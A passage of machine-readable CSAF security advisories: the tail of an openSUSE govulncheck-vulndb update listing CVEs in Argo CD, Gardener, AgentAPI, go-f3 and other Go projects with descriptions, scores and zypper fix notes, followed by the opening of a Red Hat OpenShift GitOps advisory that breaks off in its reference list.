"url": "https://www.suse.com/security/cve/CVE-2025-54468"
},
{
"category": "external",
"summary": "SUSE Bug 1249103 for CVE-2025-54468",
"url": "https://bugzilla.suse.com/1249103"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-54468"
},
{
"cve": "CVE-2025-55191",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55191"
}
],
"notes": [
{
"category": "general",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions between 2.1.0 and 2.14.19, 3.2.0-rc1, 3.1.0-rc1 through 3.1.7, and 3.0.0-rc1 through 3.0.18 contain a race condition in the repository credentials handler that can cause the Argo CD server to panic and crash when concurrent operations are performed on the same repository URL. The vulnerability is located in numerous repository related handlers in the util/db/repository_secrets.go file. A valid API token with repositories resource permissions (create, update, or delete actions) is required to trigger the race condition. This vulnerability causes the entire Argo CD server to crash and become unavailable. Attackers can repeatedly and continuously trigger the race condition to maintain a denial-of-service state, disrupting all GitOps operations. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55191",
"url": "https://www.suse.com/security/cve/CVE-2025-55191"
},
{
"category": "external",
"summary": "SUSE Bug 1250695 for CVE-2025-55191",
"url": "https://bugzilla.suse.com/1250695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-55191"
},
{
"cve": "CVE-2025-59163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59163"
}
],
"notes": [
{
"category": "general",
"text": "vet is an open source software supply chain security tool. Versions 1.12.4 and below are vulnerable to a DNS rebinding attack due to lack of HTTP Host and Origin header validation. Data from the vet scan sqlite3 database may be exposed to remote attackers when vet is used as an MCP server in SSE mode with default ports through the sqlite3 query MCP tool. This issue is fixed in version 1.12.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59163",
"url": "https://www.suse.com/security/cve/CVE-2025-59163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-59163"
},
{
"cve": "CVE-2025-59531",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59531"
}
],
"notes": [
{
"category": "general",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. Without a configured webhook.bitbucketserver.secret, Argo CD\u0027s /api/webhook endpoint crashes when receiving a malformed Bitbucket Server payload (non-array repository.links.clone field). A single unauthenticated request triggers CrashLoopBackOff, and targeting all replicas causes complete API outage. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59531",
"url": "https://www.suse.com/security/cve/CVE-2025-59531"
},
{
"category": "external",
"summary": "SUSE Bug 1250899 for CVE-2025-59531",
"url": "https://bugzilla.suse.com/1250899"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59531"
},
{
"cve": "CVE-2025-59537",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59537"
}
],
"notes": [
{
"category": "general",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD\u0027s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59537",
"url": "https://www.suse.com/security/cve/CVE-2025-59537"
},
{
"category": "external",
"summary": "SUSE Bug 1250909 for CVE-2025-59537",
"url": "https://bugzilla.suse.com/1250909"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59537"
},
{
"cve": "CVE-2025-59538",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59538"
}
],
"notes": [
{
"category": "general",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. For versions 2.9.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.6 and 3.0.17, when the webhook.azuredevops.username and webhook.azuredevops.password are not set in the default configuration, the /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty. The slice index [0] is accessed without a length check, causing an index-out-of-range panic. A single unauthenticated HTTP POST is enough to kill the process. This issue is resolved in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59538",
"url": "https://www.suse.com/security/cve/CVE-2025-59538"
},
{
"category": "external",
"summary": "SUSE Bug 1250914 for CVE-2025-59538",
"url": "https://bugzilla.suse.com/1250914"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59538"
},
{
"cve": "CVE-2025-59823",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59823"
}
],
"notes": [
{
"category": "general",
"text": "Project Gardener implements the automated management and operation of Kubernetes clusters as a service. Code injection may be possible in Gardener Extensions for AWS providers prior to version 1.64.0, Azure providers prior to version 1.55.0, OpenStack providers prior to version 1.49.0, and GCP providers prior to version 1.46.0. This vulnerability could allow a user with administrative privileges for a Gardener project to obtain control over the seed cluster where the shoot cluster is managed. This affects all Gardener installations where Terraformer is used/can be enabled for infrastructure provisioning with any of the affected components. This issue has been patched in Gardener Extensions for AWS providers version 1.64.0, Azure providers version 1.55.0, OpenStack providers version 1.49.0, and GCP providers version 1.46.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59823",
"url": "https://www.suse.com/security/cve/CVE-2025-59823"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-59823"
},
{
"cve": "CVE-2025-59824",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59824"
}
],
"notes": [
{
"category": "general",
"text": "Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to version 0.48.0, Omni Wireguard SideroLink has the potential to escape. Omni and each Talos machine establish a peer-to-peer (P2P) SideroLink connection using WireGuard to mutually authenticate and authorize access. The WireGuard interface on Omni is configured to ensure that the source IP address of an incoming packet matches the IPv6 address assigned to the Talos peer. However, it performs no validation on the packet\u0027s destination address. The Talos end of the SideroLink connection cannot be considered a trusted environment. Workloads running on Kubernetes, especially those configured with host networking, could gain direct access to this link. Therefore, a malicious workload could theoretically send arbitrary packets over the SideroLink interface. This issue has been patched in version 0.48.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59824",
"url": "https://www.suse.com/security/cve/CVE-2025-59824"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-59824"
},
{
"cve": "CVE-2025-59941",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59941"
}
],
"notes": [
{
"category": "general",
"text": "go-f3 is a Golang implementation of Fast Finality for Filecoin (F3). In versions 0.8.8 and below, go-f3\u0027s justification verification caching mechanism has a vulnerability where verification results are cached without properly considering the context of the message. An attacker can bypass justification verification by submitting a valid message with a correct justification and then reusing the same cached justification in contexts where it would normally be invalid. This occurs because the cached verification does not properly validate the relationship between the justification and the specific message context it\u0027s being used with. This issue is fixed in version 0.8.9.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59941",
"url": "https://www.suse.com/security/cve/CVE-2025-59941"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59941"
},
{
"cve": "CVE-2025-59942",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59942"
}
],
"notes": [
{
"category": "general",
"text": "go-f3 is a Golang implementation of Fast Finality for Filecoin (F3). In versions 0.8.6 and below, go-f3 panics when it validates a \"poison\" messages causing Filecoin nodes consuming F3 messages to become vulnerable. A \"poison\" message can can cause integer overflow in the signer index validation, which can cause the whole node to crash. These malicious messages aren\u0027t self-propagating since the bug is in the validator. An attacker needs to directly send the message to all targets. This issue is fixed in version 0.8.7.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59942",
"url": "https://www.suse.com/security/cve/CVE-2025-59942"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59942"
},
{
"cve": "CVE-2025-59956",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59956"
}
],
"notes": [
{
"category": "general",
"text": "AgentAPI is an HTTP API for Claude Code, Goose, Aider, Gemini, Amp, and Codex. Versions 0.3.3 and below are susceptible to a client-side DNS rebinding attack when hosted over plain HTTP on localhost. An attacker can gain access to the /messages endpoint served by the Agent API. This allows for the unauthorized exfiltration of sensitive user data, specifically local message history, which can include secret keys, file system contents, and intellectual property the user was working on locally. This issue is fixed in version 0.4.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59956",
"url": "https://www.suse.com/security/cve/CVE-2025-59956"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59956"
},
{
"cve": "CVE-2025-61595",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-61595"
}
],
"notes": [
{
"category": "general",
"text": "MANTRA is a purpose-built RWA Layer 1 Blockchain, capable of adherence to real world regulatory requirements. Versions 4.0.1 and below do not enforce the tx gas limit in its send hooks. Send hooks can spend more gas than what remains in tx, combined with recursive calls in the wasm contract, potentially amplifying the gas consumption exponentially. This is fixed in version 4.0.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-61595",
"url": "https://www.suse.com/security/cve/CVE-2025-61595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-61595"
},
{
"cve": "CVE-2025-61926",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-61926"
}
],
"notes": [
{
"category": "general",
"text": "Allstar is a GitHub App to set and enforce security policies. In versions prior to 4.5, a vulnerability in Allstar\u0027s Reviewbot component caused inbound webhook requests to be validated against a hard-coded, shared secret. The value used for the secret token was compiled into the Allstar binary and could not be configured at runtime. In practice, this meant that every deployment using Reviewbot would validate requests with the same secret unless the operator modified source code and rebuilt the component - an expectation that is not documented and is easy to miss. All Allstar releases prior to v4.5 that include the Reviewbot code path are affected. Deployments on v4.5 and later are not affected. Those who have not enabled or exposed the Reviewbot endpoint are not exposed to this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-61926",
"url": "https://www.suse.com/security/cve/CVE-2025-61926"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-61926"
}
]
}
RHSA-2025:17730
Vulnerability from csaf_redhat - Published: 2025-10-09 18:47 - Updated: 2025-12-04 17:10Summary
Red Hat Security Advisory: Red Hat OpenShift GitOps v1.16.4 security update
Notes
Topic
Important: Red Hat OpenShift GitOps v1.16.4 security update
Details
An update is now available for Red Hat OpenShift GitOps.
Bug Fix(es) and Enhancement(s):
* GITOPS-6703 (After Upgrade to v.1.16 not able to add --metrics-application-labels in spec.controller.extraCommandArgs with multiple values)
* GITOPS-7180 (Redis HA Proxy pod fails to start with Security Context error)
* GITOPS-7461 (Redis container fails with "runAsNonRoot and image will run as root" after upgrade to argocd-operator 0.14.1)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Important: Red Hat OpenShift GitOps v1.16.4 security update",
"title": "Topic"
},
{
"category": "general",
"text": "An update is now available for Red Hat OpenShift GitOps.\nBug Fix(es) and Enhancement(s):\n* GITOPS-6703 (After Upgrade to v.1.16 not able to add --metrics-application-labels in spec.controller.extraCommandArgs with multiple values)\n* GITOPS-7180 (Redis HA Proxy pod fails to start with Security Context error)\n* GITOPS-7461 (Redis container fails with \"runAsNonRoot and image will run as root\" after upgrade to argocd-operator 0.14.1)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:17730",
"url": "https://access.redhat.com/errata/RHSA-2025:17730"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59531",
"url": "https://access.redhat.com/security/cve/CVE-2025-59531"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59537",
"url": "https://access.redhat.com/security/cve/CVE-2025-59537"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59538",
"url": "https://access.redhat.com/security/cve/CVE-2025-59538"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-55191",
"url": "https://access.redhat.com/security/cve/CVE-2025-55191"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-22874",
"url": "https://access.redhat.com/security/cve/CVE-2025-22874"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
